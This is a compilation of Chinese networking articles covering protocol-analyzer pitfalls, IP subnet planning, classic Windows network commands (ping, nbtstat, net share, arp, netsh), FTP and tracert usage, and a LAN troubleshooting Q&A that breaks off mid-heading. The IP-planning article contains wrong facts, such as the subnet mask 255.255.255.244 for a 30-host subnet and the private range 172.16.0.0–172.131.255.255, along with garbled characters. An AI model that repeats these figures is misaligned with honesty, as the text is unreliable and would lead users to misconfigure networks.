    协议分析器是网络管理员库中最强有力的工具之一。它能将难处理、耗时长、让CEO们感到恼火甚至不得不重启所有机器的问题转变为能短时处理、易于在每周例行状态报告中反映的问题，为公司省下大量的时间与金钱。
    然而，就像其它任何复杂工具一样，它必须被适当运用才能获得最大的效益。在使用协议分析器诊断网络故障时，应当尽量避免……
    错误1 分析器误置
    正确放置分析器对快速诊断故障具有决定性作用。设想分析器是置于网络中的窗口，犹如建筑物窗口一般，视野的改变依赖于从哪个窗口看出去。从南面窗口望去是看不到建筑物北面高速公路上交通的拥挤状况的。在分析置于网络不当位置的分析器时，跟踪往往要花很长时间。那么，怎样正确放置分析器呢？我们可以举例说明。
    以下为几个可能出现的问题及原因分析：
    设想A：一台主机，服务器A，主机不能与其它任何主机通信。可能的原因：
    1） 服务器A没有正确配置；
    2） 服务器A配置的网卡出错；
    3） 服务器A所在局域网出了问题；
    4） 服务器A所在局域网段出错。
    设想B：一台主机，服务器B，主机不能与远程网X中的任何一台主机通信；且局域网或其它远程网中的主机无任何故障（这就意味着问题不可能出现在服务器B或服务器B所在局域网段上）。
    可能原因：
    1） 服务器B有关网络X的部分配置错误；
    2） 服务器B用于连接到网络X的路由器所在网段的连接出了问题；
    3） 服务器B所在局域网与网络X的一处或多处链接出了问题；
    4） 网络X用于连接到服务器B所在网络的路由器所在网段出了问题；
    5） 网络X出了问题。
    设想C：一台主机，服务器C，主机不能与局域网中另一主机通信，但与网络中其它主机通信正常（这意味着问题不可能出现在服务器C或服务器C所在局域网段）。
    可能的原因：
    1） 主机C错误配置；
    2） 主机C网卡出现故障；
    3） 主机C所在局域网段出了问题。
    设想D：一台主机，服务器D，主机不能与一远程主机通信，但与服务器D所在局域网段的其它主机通信正常，到远程网或远程网自身的连接亦无故障。
    可能原因：
    1） 主机D错误配置；
    2） 主机D网卡出错；
    3） 主机D所在局域网段出了问题。
    这些问题当中个别的不用分析器也可诊断或排除。例如：设想A中的第三种情况，就能通过检查服务器A所在局域网的其它主机决定故障所在；设想D中的第二和第三种情况亦能通过这种方法确定（假设主机D能与局域网中其它主机通信）。
    一台服务器或主机的错误配置通过检测很容易被发现。但另外一些问题，像网络或网段中的故障，就需要分析器来诊断。
    在以上所有可能的设想中，一开始或许会将分析器置于离最有可能出现问题的主机或是怀疑有问题的网络、网段尽可能近的地方，但是如果未发现有意义的问题，得准备好移动分析器，要知道，在出现故障的位置被确定以前，所做的一切都是建立在猜想基础上的。在以上设想B的第三种情况中，服务器B所在局域网和网络X中都应该有分析器，至少分析器应该能够从一端被移动到另一端。
    例如，一次故障中，一台服务器突然停止了工作。人们起初怀疑是站点人员对服务器实施了误操作所致，实际上跟踪器表明，是因为众多主机向服务器发送连接请求信息的同时服务器却没有响应，致使服务器死锁。
    在花了几天时间来判断到底服务器出了什么问题后，被告知观察跟踪器，于是请求站点操作员将跟踪器从主机所在局域网（这里指设想B中第三种情况的网络X）移到服务器所在局域网。结果发现访问控制列表没有被正确添加到服务器所在局域网的路由器上，这份错误的访问控制列表过滤了所有来源于客户端主机所在网络的信息。假若当初多一些怀疑的话，就会发现在服务器所在局域网中根本就没见到过连接请求信息。因为没有同时查看网络两端的情况，致使站点很多天不能工作。
    怎么知道跟踪器在网络的哪一端起作用呢？在跟踪器中，发自客户端主机的帧信息都具有实客户端所有的源MAC地址，与此同时，目标MAC地址则存放在路由器中。
    不幸的是，问题变得越来越复杂，仅仅知道分析器连接于哪个网络还不够。当将一个局域网分解成多个部分时，首要的是去找到空闲Hub端口或同轴电缆的分接头，然而，在网络交换环境下，并不是仅仅将分析器接入交换设备的空闲端口就万事大吉了。
    大多数交换设备都具备将特定端口指定为分接头或映像端口的能力，只是所用术语因交换设备制造厂商不同而有别。如果所有来自或发往特定端口的通信同样能发送到映像端口，这时只要将分析器连接到映像端口，所有设置即告完成。
    但问题在于有些交换设备不能将两端口之间的通信发送到映像端口。举例说，在双工环境下，作为监控的连接之一部分的两台主机能同时发送信息，交换机也能接收每帧数据并将其传输到链接中的另外端口。但对于映像端口，必须对某一数据帧进行缓冲，如果这样处理了太多帧，缓冲区就会溢出，数据帧就会丢失，跟踪因此变得不可靠。更糟的是，根本就不知道是在跟踪不可靠的线索。
    某些交换设备支持内部分析器功能，这类交换机本身能够俘获传向被跟踪对象的数据帧。这种功能部件的可靠性依赖于交换机的缓冲容量。在某些情况下，我们不得不选择映像端口或是内部分析器方式。但只要有可能，最好是将主机之一和分析器连接到Hub，并将Hub挂到交换机上。
    为什么这么做呢？这是因为即使确信交换机有足够容量缓存所有数据帧，以至于映像端口或内部分析器不可能丢数据，跟踪仍然是不可靠的。例如，标准以太网中，一个处于交换机有故障端口的RJ45连接器每当交换机向服务器传输数据帧时都会创建交互式会话，交换机将此解释成为一次冲突并停止工作，当尝试16次之后数据帧就会撤消，但数据帧仍被发送到映像端口，因此跟踪器发现了数据帧并显示服务器响应失败。另一种情况是：不合规格的配线导致1%的数据帧破坏。如果将分析器与第一种情况（任何位置的数据帧都能传送）中提到的的主机一起挂到Hub，或者与第二种情况（网络中有被破坏的数据帧）中主机一起挂到Hub，接收交换机的端口会在未将数据帧发往映像端口之前就将它们撤消，跟踪器没有任何错误指示。当然，每当改变一种方式，都得冒一定风险来纠正可能出现的意外问题。如果RJ45连接器出现故障仅仅是因为没有在交换机端口将其固定好，那么只要将连接器重新插入Hub，故障或许也就不存在了，至少问题是得到了解决。
    另外需要记住的是，对于交换设备，在其网段内每个端口都是有效的，因此当连接到服务器的交换端口未发现问题时，应将Hub（或分析器）移动到主机或路由器交换端口。
    还有，注意不能将Hub挂到双工环境。有些分析器能以双工方式工作，这类分析器有两个以太网口和一个功能模块，功能模块将通信对分为两部分，并分别发送到每一以太网口，之后软件把从每个以太网口接收来的数据结合成单一的跟踪链。如果网络是双工环境，就需要这种分析器。
    错误2 过多的过滤
    过滤功能允许协议分析器忽略某些数据帧，从而为感兴趣的帧腾出更多的俘获缓冲空间。如果能过滤来源于较高协议层的数据，如IP地址和端口号以至更高层数据，则分析器几乎很少需要基于源或目标MAC地址的过滤。然而，实际跟踪中通常出现的问题是过滤太多。
    有一个站点出现过这样的故障：服务器与一特定客户端之间的连接出了问题，莫名其妙地断开了，其它客户端都没有任何问题。由于客户端与服务器处在同一子网，一旦发生断开现象，使客户端与服务器恢复连接的唯一办法是重新启动服务器。
    这个站点安装了分析器，同时因为数据量大，配置了过滤器，只允许俘获两主机（基于MAC地址）之间的数据帧。前两天中没有发现问题，但在第三天问题出现了：跟踪表明服务器突然停止了发送多路会话和最后一次会话。当从服务器端ping客户端时，跟踪器显示服务器没有发送任何数据帧。站点操作员得出的结论是：TCP栈或操作系统出了问题。
    于是请求另一次跟踪，这次没有使用过滤器。一天半以后俘获了另一事件：跟踪清楚表明服务器持续发送数据，而与此同时却再也没有得到应答。经过更深层挖掘，发现服务器数据帧的目标MAC地址突然改变了。
    既然目标MAC地址不再与客户端的相匹配，那么第一次未使用过滤器的跟踪就不再俘获到MAC地址，同时表明服务器已停止了工作。另外发现就在地址改变之前，服务器无故收到带有为客户端IP地址配置的新MAC地址的ARP信息包，这导致服务器升级ARP缓存并向错误主机发送数据。
    通过ARP数据帧的源MAC地址由无故发送ARP的主机向下跟踪，不知何故，主机居然同时配置了复用于客户端的静态IP地址和DHCP地址。当主机启动时，分配的是静态地址，这与服务器相冲突，于是调用DHCP，正确地址才配置上。
    基于这一点可得出这样一个结论：用过滤器看似很有道理，但很多时候问题的根源往往以假象出现在过滤器之外，如果跟踪器没有表明问题的起因，过滤器应当关闭，或至少应当扩展一下，直至跟踪器确实查出原因。仅当所有过滤器都关闭后跟踪器仍无法查出问题起因，才可以得出结论——对网络已无计可施了。
    错误3
    俘获时帧太短
    前面例子中表明，站点操作员使用过滤器是因为网络中数据量过大。分析器仅能俘获大约3分钟时间的数据，这使得站点操作员几乎不可能发现问题的发生并使分析器及时加以阻止以真正找到问题的起因。分析器能够俘获数据帧而没有将它们填入俘获缓冲区的时间长短取决于网络的速度、网络中帧的数量、帧的大小以及俘获缓冲区的大小。
    几乎所有分析器都能控制俘获数据帧的大小，这在处理连接问题和不太高协议层问题时显得很有用。在通常情况下，只要俘获数据的第一个64字节也就足够了。因此，如果网络中所有帧都是1024字节而仅有3分钟俘获时间，那么仅俘获64字节将允许有超过30分钟的俘获时间。
    错误4
    触发器安装不正确
    触发器告诉分析器执行某项操作，比如终止俘获。当等待问题发生而又不知道将何时发生时，触发器显得很有用。
    安装触发器意味着没有必要随时以手动方式来控制分析器。触发器安装的最大问题往往是没有正确定义，这会大大延长解决问题的时间。
    当然，应该详细知道怎样安装触发器，并且，若有可能，在使用之前进行测试。有时可以安装另一台分析器来发送触发数据帧，以确认俘获分析触发器已正确安装。
    使用触发器带来的另一问题是，许多分析器允许设置将被预触发的俘获缓冲区的百分比。举例来说，可以指定50%的缓冲区在触发之前俘获，而另外50%的缓冲区在触发之后俘获。预触发的百分比通常是0、25、50、75或100。
    如果预触发值设置不当，就有可能俘获不到足够的相关数据帧来诊断问题所在。预触发值有可能被错误设置是因为其默认设置对现行问题往往不适用：也许是因为未将针对前一问题的设置升级，也许是因为粗心的鼠标操作或错误按键。无论何种原因，一定要确认触发器已正确安装。
    那么怎样来设置呢？通常是将预触发百分比设为100%，以知道是什么原因导致触发器关闭。
    当然，只有当触发器在触发某事件时，它才处于关闭状态。过去使用过特殊的触发程序，它能测试状态，然后发送信息包，分析器可将此信息包用作触发器。测试状态可以是日志文件中的错误信息，或是上例中无法创建连接的情况。一般整个程序也就一百多行或稍长一些。
    错误5
    日期/时间设置不正确
    没有正确设置分析器上的日期/时间看似一件小事，很多时候可能也确实是这样。然而，当处理广域网络中的问题时，有时同时运行两台分析器，网络每端一台，则正确设置日期/时间是相当有用的。
    如果将两台分析器时钟设置相同，调整跟踪会变得更为容易。假定在一个例子中，通过发现通用帧并比较时间，会发现其中一台用了4小时37分，比另一台提前了15.7891秒，如果时钟设置同步误差在1到2秒，时间差距计算也就容易多了。
    另外，如果需要费劲地随主机中的事件调整跟踪，由于基于时间包的同步是不可选的，则设置相同的日期/时间绝对具有实质意义。
    错误6 不理解协议
    很多分析器具有“专家分析”功能，指的是它们能保持对信息的追踪，像序列号、时间信息、显示重传信息、冻结窗口、无应答状态等等。这类分析相当有用，但也有可能造成误导，尤其在分析器没有正确报错时。
    举个例子，有一种情况：从一远程位置发来的远程登录会话无法建立，而发自局域工作站的远程登录会话却没有问题。于是站点操作人员在远程登录服务器所在的局域网挂一分析器，跟踪器表明从远程主机到远程登录服务器的数据帧没有报错；于是他们得出结论是操作系统故障。
    另一位操作人员查看跟踪器发现，局域端远程登录会话连接到端口2323，而远程会话连接到端口23。另外，远程登录服务器响应远程连接请求的信息包包含了RST标志设置。
    在这里，站点操作人员没有仔细查看TCP细节，因此没有意识到不同端口号和RST包的重要性，他们依赖来源于分析器的诊断信息，既然远程登录服务器的端口23没有安装，凭感觉猜想也认为是操作系统出了问题。然而，若站点工作人员了解TCP和远程登录，他们就会立即发现问题所在并能在5分钟内找到一个好的解决办法。
    事实上是，他们等半天时间来安装跟踪器，结果失去了远程网上数目相当可观的客户。


网络规划中的IP地址分配

《一键清理系统垃圾》

网络规划中的IP地址分配

       在网络规划中，IP地址方案的设计至关重要，好的IP地址方案不仅可以减少网络负荷，还能为以后的网络扩展打下良好的基础。本文就网络规划中IP地址方案设计进行一些讨论，并给出一个IP地址方案设计实例。
    一、IP地址和子网掩码

    IP地址用于在网络上唯一标识一台机器。根据RFC791的定义，IP地址由32位二进制数组成(四个字节)，表示为用圆点分成每组3位的12位十进制数字(xxx.xxx.xxx.xxx)每个3位数代表8位二进制数(一个字节)。由于1个字节所能表示的最大数为255，因此IP地址中每个字节可含有0～255之间的值。但0和255有特殊含义，255代表广播地址：IP地址中0用于指定网络地址号(若0在地址末端)或结点地址(若0在地址开始)。例如， 192？168？32？0指网络192.168.32.0，而0.0.0.62指网络上结点地址为62的计算机。
    根据IP地址中表示网络地址字节数的不同将IP地址划分为三类，A类，B类，C类。A类用于超大型网络(百万结点)，B类用于中等规模的网络(上千结点)，C类用于小网络(最多254个结点)。A类地址用第一个字节代表网络地址，后三个字代表结点地址。B类地址用前两个字节代表网络地址，后两个字节表示结点地址。C类地址则用前三个字节表示网络地址，第四个字节表示结点地址。见表1。
    网络设备根据IP地址的第一个字节来确定网络类型。A类网络第一个字节的第一个二进制位为0；B类网络第一个字节的前两个二进制位为10；C类网络第一个字节的前三位二进制位为110，见表2。换成十进制可见A类网络地址从1～127，B类网络地址从128～191，C类网络地址从192～223。224～239间的数有时称为D类，239以上的网络号保留。
    子网掩码用于找出IP地址中网络及结点地址部分。子网掩码长32位，其中1表示网络部分，0表示结点地址部分。A类，B类，C类网络的子网掩码见表3，如一个结点IP地址为192.168.202.195，子网掩码255.255.255.0，表示其网络地址为192.168.202，结点地址为195。
    有时为了方便网络管理，需要将网络划分为若干个网段。为此，必须打破传统的8位界限，从结点地址空间中“抢来”几位作为网络地址。具体说来，建立子网掩码需要以下两步：
    1？确定运行IP的网段数
    2？确定子网掩码
    首先，确定运行IP的网段数。便如，你的网络上由五个网段，但只让三个网段上的用户访问Internet，则只有这三个网段需要配置IP。在确定了IP网段数后，再确定从结点地址空间中截取几位才能为每个网段创建一个子网络号。方法是计算这些位数的组合值。比如，取两位，有四种组合(00、01、10、11)，取三位有八种组合(000、001、010、011、100、101、110、111)。需要注意的是，在这些组中须除去全0和全1的组合。因为在IP协议中规定了全0和全1的组合代表了网络地址和广播地址，所以如果我们需要将C类网络(192.168.123.0)划分为4个网段，需要截取结点地址的前3位作为网络地址，与之对应的子网掩码就是255.255.255.244(11111111.11111111.11111111.11100000)，将此子网掩码用到地址192.168.123.0上得到的值见表4。
    可见，采用以上子网络方案，每个子网络有30个结点地址。通过从结点地址空间中截取几位作为网络地址的方法，可将网络划分为若干网段，方便了网络管理。

    二、设计IP地址方案实例

    在网络规划的过程中，绘制一幅准确的网络图是不可缺少的。准确的网络文档对于日后的升级和分析问题是不可或缺的帮助。好的网络图应包含连接不同网段的各种网络设备的信息，比如路由器、网桥、网关的位置、IP地址，并用相应的网络地址标注各网段。若网络很小，只有一个网段，可同时画出其它关键网络设备(如服务器)，包括网络地址。如图所示这是一幅简单的网络图，其中五个网段经服务器互连(这里由服务器提供路由功能)，一个用于主干网连接其它网段。
    在设计IP地址方案之前，应考虑以下几个问题：
    ？是否将网络连入Internet
    ？是否将网络划分为若干网段以方便网络管理
    ？是采用静态IP地址分配还是动态IP地址分配
    如果不计划连到Internet上，则可用RFC1918中定义的非Internet连接的网络地址，称为“专用Internet地址分配”。RFC1918规定了不想连入Internet的IP地址分配指导原则。由Internet地址授权机构(IANA)控制IP地址分配方案中，留出了三类网络号，给不连到Internet上的专用网用，分别用于A，B和C类IP网，具体如下：
    10.0.0.0～10.255.255.255
    172.16.0.0～172.131.255.255
    192.168.0.0～192.168.255.255
    IANA保证这些网络号不会分配给连到Internet上的任何网络，因此任何人都可以自由的选择这些网络地址作为自己的网络地址。表5是采用保留IP地址的网络地址分配方案。
    如果计划将网络连入Internet，则需要向ISP申请一个网络地址。这里，我们假定得到了一个C类网络地址192.168.168.0。根据网络图所示，整个网络划分为5个网段，每个网段都使用IP，因此必须用至少能建5个子网的子网掩码。这里，我们采用的子网掩码是255.255.255.244。网络的IP地址分配方案如表6所示。
    不难看出，采用子网掩码255.255.255.224将网络划分为5个网段后，每个网段可用的IP地址数为30个。如果某个网段的结点数超过了30个，可采用动态IP地址分配协议(DHCIP)加以解决。

返回


网络经典命令

《一键清理系统垃圾》

网络经典命令

1、测试物理网络
命令：ping 192.168.0.8 －t ，参数－t是等待用户去中断测试
友情提示：这个是最基本，最常用的网络命令
2.查看DNS、IP、Mac等信息
A.Win98：winipcfg
B.Win2000以上：Ipconfig/all
3.网络信使
命令：Net send 计算机名/IP　* (广播) 传送内容，注意不能跨网段
命令：net stop messenger 停止信使服务，也可以在面板－服务修改
命令：net start messenger 开始信使服务
4.探测对方计算机名，所在的组、域及当前用户名 （追捕的工作原理）
命令：ping －a IP －t ，只显示NetBios名
命令：nbtstat -a IP 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
命令：netstat -s -e
比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址
命令：arp -a
7.在代理服务器端
捆绑IP和MAC地址，解决局域网内盗用IP！：
命令：ARP －s 192.168.10.59 00 －50－ff－6c－08－75
解除网卡的IP与MAC地址的绑定：
命令：arp -d 网卡IP
8.在网络邻居上隐藏你的计算机
命令：net config server /hidden:yes
命令：net config server /hidden:no 则为开启
9.net命令
A.显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。
比如：查看这个IP上的共享资源，就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释

网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如：net use z: \192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net session
例如: C:\>net session
计算机 用户名 客户类型 打开空闲时间

\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert software.pchome.net
B.pathping software.pchome.net 除了显示路由外，还提供325S的分析，计算丢失包的％
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享（可以编个bat文件，开机自运行，把共享都删了！）
命令：net share c&#36; /d
命令：net share d&#36; /d
命令：net share ipc&#36; /d
命令：net share admin&#36; /d
注意&#36;后有空格。
C.增加一个共享：
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface ip>show address
Arp
显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表，它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用，则 arp 命令将显示帮助信息。
文字


网络命令程序使用全攻略

《一键清理系统垃圾》

网络命令程序使用全攻略

    Windows98/2000中有一些自带的小程序，在开始选单中没有设定快捷方式，要在“运行”对话框或MS-DOS方式下输入程序文件名才能执行它们。多数“菜鸟”级的用户往往忽略了它们的存在，但它们却非常实用，可以实现诸多网络和系统的辅助功能。

    这些程序主要是有关网络、系统配置和诊断的工具。它们包括：Ping、Tracert、FTP、Drwatson、Regedit、Winipcfg、Winpopup、 MSConfig、Winfile（注：后四个命令在Windows2000中无效）等程序。其中的Ping、Tracert和FTP命令只有在安装了TCP/IP协议之后才能使用。下面分别介绍这几个网络命令的用法。这些命令大家或多或少都知道一点，这里就详细说说几个比较实用的网络命令。

    1．网络连通测试命令Ping

    Ping命令通过向计算机发送Internet控制信息协议（ICMP）回应报文并且监听回应报文的返回，以校验与远程计算机或本地计算机的连接情况。对于每个发送报文，Ping最多等待1秒并打印发送和接收报文的数量，比较每个接收报文和发送报文，以校验其有效性。默认情况下，发送四个回应报文，每个报文包含32字节的数据（周期性的大写字母序列）。

    Ping命令的格式：

    Ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] | [-k host-list]] [-w timeout] destination-list

    其中，destination-list是目的计算机的地址。Ping命令的这些参数中，主要用到的有-t（不断向指定的计算机发送报文，按 Ctrl+Break可以查看统计信息或继续运行，直到用户按Ctrl+C键中断）；-a（将IP地址解析为计算机名）；-n count（发送由count指定数量的回应报文）和-l size（发送由size指定数据大小的回应报文）。例如Ping 263的主页地址，在MS-DOS方式下输入C:>ping www.263.net。

    Ping命令经常用来对TCP/IP网络进行诊断。通过向目的计算机发送一个报文，让它将这个报文返送回来，如果返回的报文和发送的报文一致，那就是说你的Ping命令成功了。如果在指定时间内没有收到应答报文，则Ping就认为该计算机不可达，然后显示“Request time out”信息。通过对Ping的数据进行分析，就能判断出计算机是否开着，网络是否存在配置、物理故障，或者这个报文从发送到返回需要多少时间。也可以使用Ping实用程序测试计算机名和IP地址，如果能够成功校验IP地址却不能成功校验计算机名，则说明名称解析存在问题。

    当然，报文返回时间越短，Request time out出现的次数越少，则意味着与此计算机的连接稳定和速度快。
    2．路由分析诊断程序Tracert

    该诊断实用程序通过向目的地发送具有不同生存时间的ICMP回应报文，以确定至目的地的路由。也就是说，Tracert命令可以用来跟踪一个报文从一台计算机到另一台计算机所走的路径。比如你在上网时，想知道从你的计算机如何走到263主页的，可在MS-DOS方式下，输入命令Tracert www.263.net并回车。

    C:>tracert www.263.net

    Tracing route to www.263.net [211.100.31.131]

    over a maximum of 30 hops:

    1 <10 ms <10 ms <10 ms 202.195.243.1

    2 10 ms <10 ms 10 ms 202.195.240.254

    3 <10 ms <10 ms <10 ms 210.29.33.9

    .......

    15 190 ms 170 ms 180 ms 211.100.24.4

    16 100 ms 111 ms 120 ms 211.100.31.131

    Trace complete.

    左边的数字是该路由经过的计算机数目和顺序。“*”表示往返时间太长，Tracert 将这个时间“忘记了”，“10ms”是向经过的第一个计算机（202.195.243.1）发送报文的往返时间，单位为毫秒。由于每个报文每次往返时间不一样，Tracert将显示三次往返时间。在时间信息之后，是计算机的名称信息，是便于人们阅读的域名格式，也有IP地址格式。它可以让你知道，你的计算机与目的计算机在网络上距离有多远，要经过几步才能到达。
    3．文件传送命令FTP

    FTP是文件传送命令，通过FTP可直接进行文字和非文字信息的双向传送，即用户可在Internet上，从运行FTP服务的计算机上下载或上传文件。

    在MS-DOS方式下，输入FTP回车，就启动了FTP，并进入FTP的命令提示符方式，我们可以看到，FTP与DOS很相似，它包含了许多命令，常用FTP 命令如下：

    ftp －v －d － i －n －g [主机名]

    其中：－v 显示远程服务器的所有响应信息。
    －d 使用调试方式。
    －n 限制ftp的自动登录,即不使用.netrc文件。
    －g 取消全局文件名

    一般FTP服务器采用的是匿名方式，就是说用户可以使用匿名身份与远程计算机建立连接并从远程计算机上拷贝文件，而不必是此远程计算机的注册用户。当用户使用Open命令连接FTP服务器，登录时可以如下填写：Username：ftp（或 anonymous、guest等），Password：任意E-mail地址或空值。登录成功后，首先通过Cd命令逐层进入下载文件所在的目录，然后用Lcd命令确定保存文件的本地目录，最后通过Get命令下载所需的文件。任务完成后，输入Quit命令断开与远程计算机的连接，退出FTP方式。

    目前，网友们大多使用专门的FTP软件进行文件传送，如CuteFTP、FTP Control等，这些软件都采用Windows图形界面，比命令提示符方式使用方便。但如果计算机上没有安装这些软件，使用Windows 98自带的FTP命令，也能完全实现文件传送的功能。

    4．IP配置程序Winipcfg

    IP配置实用程序允许用户或管理员查看当前IP地址和其他与网络配置有关的有用信息。单击“开始”，然后再单击“运行”，在“运行”对话框中，输入Winipcfg 并确定，出现IP配置的信息窗口，单击“详细信息”，则出现更为详细的网络配置信息，其中显示了此时拨号上网的计算机具体的IP配置，分为主机信息和网络适配器信息，包括DNS服务器地址、计算机的IP地址、子网掩码等，一目了然。要查看其他网络适配器的地址信息，可从“Ethernet适配器信息”列表中选择相应的适配器。目前大多数拨号上网的计算机是由ISP动态分配IP地址，并不使用固定的IP地址，所以在上网时，使用该程序可以知道此次上网本机的IP地址和子网掩码等信息。


网络维护专题

《一键清理系统垃圾》

网络维护专题

    为何无路由可实现共享上网
    问：在有关“无路由器实现共享上网”问题中，所有客户端和代理服务器均使用Windows 98 SE。但Windows 98 SE无法实现双网卡之间路由，为何可以实现共享Internet 呢?代理服务器需要几块网卡?
    答：对于无路由的ADSL连接，只能通过宽带路由器或代理服务器才能实现Internet连接共享。当采用宽带路由器时，可以将ADSL连接至WAN口，将集线器连接至LAN口，然后，再设置宽带路由器。当采用代理服务器时，代理服务器通常需要安装两块网卡，其中一块连接至ADSL，另一块连接至局域网集线器。
    当使用Windows的ICS（Internet连接共享）实现共享上网时，可以采用双网卡。虽然Windows 98 SE不具有路由功能，但仍然可以借助于ICS实现网络地址转换（NAT），从而共享Internet连接。在Windows 2000/XP中，也可以借助于网桥的方式实现Internet连接共享。
    实现局域网文件夹的映射和管理
    问：怎样实现局域网内文件夹的映射，使得无论在哪台电脑上改动此文件夹，其他所有电脑上的相同文件夹动态随之改动?怎样不用加密软件在网内给文件夹加密?怎样给文件夹配额，即固定文件夹的空间大小?
    答：可以将该共享资源映射为网络驱动器，这样，当网络资源发生变化后，所有有权用户在访问该共享文件夹时，都会得到修改后的文件资源。对于需要移动使用数据库的用户而言，若欲将该共享文件夹与本地硬盘数据同步，实现脱机浏览，可以使用“同步”功能，使得笔记本电脑在接入或离开局域网时，实现与服务器共享资源的自动同步。
    在Windows 2000各版和Windows XP Professional版中，当采用NTFS文件系统时，只须在欲加密的文件或文件夹上右击鼠标，在快捷菜单中选择“属性”。然后在“属性”对话框中单击“高级”按钮，在“高级属性”对话框中选中“加密内容以便保护数据”复选框，并依次单击“确定”按钮，即可进行加密处理。加密后的文件，将只有当前用户正确登录时才能被显示，从而确保数据的安全。需要注意的是，Windows XP Home版不支持加密。
    在Windows 2000/XP/2003中，当采用NTFS文件系统时，在欲设置磁盘配额的卷标上右击鼠标，在快捷菜单中选择“属性”。然后，在“属性”对话框中选择“配额”选项卡，选中“启用配额管理”复选框，同时选择“将磁盘空间限制为”选项，并指定配额空间。若欲为个别用户指定不同的配额，可单击“配额项”按钮，进行详细设置。

    开启Guest账号也无法共享资源
    问：办公室的计算机是Windows XP操作系统，以前开启过Guest来宾账号，局域网中的其他计算机就可以访问其中的共享文件夹。不知道是什么原因，现在再在“网上邻居”中单击该计算机时，会出现无权访问的提示。该怎么处理?
    答：建议采用以下几个步骤处理：
    第一，确认当前用户（如登录的用户名和以前的不一样）的设置中，Guest来宾账号是否也处于启用状态。
    第二，确认连接至局域网的连接没有启用“Internet连接防火墙”。
    第三，重新运行“设置家庭或小型办公网络”，将该计算机重新添加至网络。
    第四，重新设置共享文件夹。
    第五，检查IP地址信息是否正确。
    除了FTP，其它网络服务均不能使用
    问：内部局域网通过Windows 2000的ICS连接至Internet。最近发现，Windows 98工作站仅FTP下载正常，而音视频点播和QQ等都无法使用，Windows 2000下所有Internet服务均告失败。应当如何解决?
    答：Internet连接共享与客户端操作系统无关。既然Windows 98可以使用FTP服务，说明Internet连接没有问题。因此，应当将故障位置限制在ICS主机和客户端。建议采用以下几个步骤处理：
    第一，检查ICS主机的DNS设置是否正确。当DNS设置出现错误时，只有那些可以通过IP地址访问的Internet服务才正常。
    第二，ICS主机同时提供DHCP服务，因此，网络内的计算机均应采取自动获取IP地址的方式，避免由于IP地址信息键入错误而导致网络失败。
    第三，由于ICS是以地址映射方式实现Internet连接共享，所以，客户端及所有Internet应用程序均无需做任何设置，就跟该计算机直接连接至Internet一样。
    第四，在Windows2000下运行ipconfig命令，检查IP地址是否为“192.168.0.x”，如果IP地址为“169.254.x.x”，则表明与网络无法正确连接。应当检查网络的连通状况。
    第五，查看ICS主机是否安装了防火墙，并阻止了除FTP服务以外的其他服务。

    局域网内用户访问外网不畅
    问：办公室内有20台PC和5台笔记本电脑上网，网络已经配置完毕。服务器运行Windows 2000，启用DHCP、DNS、IIS、SQL2000服务，运行有OA和Web服务器，安装双网卡。因公司暂时没采用静态IP地址，而使用ADSL+Windows 2000的ICS共享Internet连接。局域网访问互联网的速度奇慢，有时需要刷新好几次才能打开网页。Ping局域网均正常，局域网Ping网站有时正常地返回Times和TTL值，但是网页打不开。如何才能让局域网快起来?
    答：试着从以下几个方面着手解决问题：
    第一，如果将DHCP等网络服务以及SQL数据库服务全部集中在代理服务器一台机器上，将造成系统负担过大，而使Internet连接共享服务的效率大打折扣，从而导致Internet连接速率大幅下降。建议关闭不必要的服务，或者将对系统资源要求高的服务配置到其他机器上。另外也请检查机器是否中了蠕虫病毒。
    第二，Windows 2000自带的Internet连接共享效率并不是很高，只适应于小范围的场合，如果机器数量比较多，推荐使用Windows 2000中自带的NAT或者使用ISA Server做代理服务器，使用Wingate、Sygate之类的代理软件效果也不错。这是使用Windows 2000的Internet连接共享的常见问题。
    第三，试着从代理服务器上测试一下Internet连接速度。如果代理服务器上连接速度也非常慢，应当与ISP联络，更换ADSL链路或ADSL Modem。
    第四，检查局域网的集线设备工作是否正常，并重新启动交换机。
    USB双机互连的设置
    问：笔记本电脑（Windows XP系统带单网卡）和台式机（Windows 98系统带单网卡，接入广电宽带）各一台，利用USB连接线（USB2.0并带软件）联网。Windows XP系统能看到Windows 98的共享文件，反之不行。局域网游戏也只能由Windows 98机器加入Windows XP机器建立的游戏中。应该如何设置共享? USB连接线的桥接设置可以使用吗?用网线连机（每台机子只有一块网卡）能同时上网吗?
    答：第一，若欲Windows 98共享Windows XP中的文件和正常连机游戏，必须在Windows XP中执行两项操作。一是启用Guest匿名账户；二是运行“设置家庭或小型办公网络”向导。
    第二，可以在台式机中设置桥接来方便信息交换。其中，USB连接线的连接可以视为本地网络，而连接至广电Cable Modem的网卡视为Internet连接，然后，借助于桥接即可实现双机的Internet连接共享。
    第三，每台计算机上只有一块网卡是无法实现Internet连接共享的，除非Cable Modem或ADSL Modem为USB接口或内置。因此，应当在台式机上再安装第二块网卡，其中，一块连接至笔记本电脑，另一块连接至Cable Modem。然后，再在台式机上设置Internet连接共享。
    防火墙冲突导致无法上网
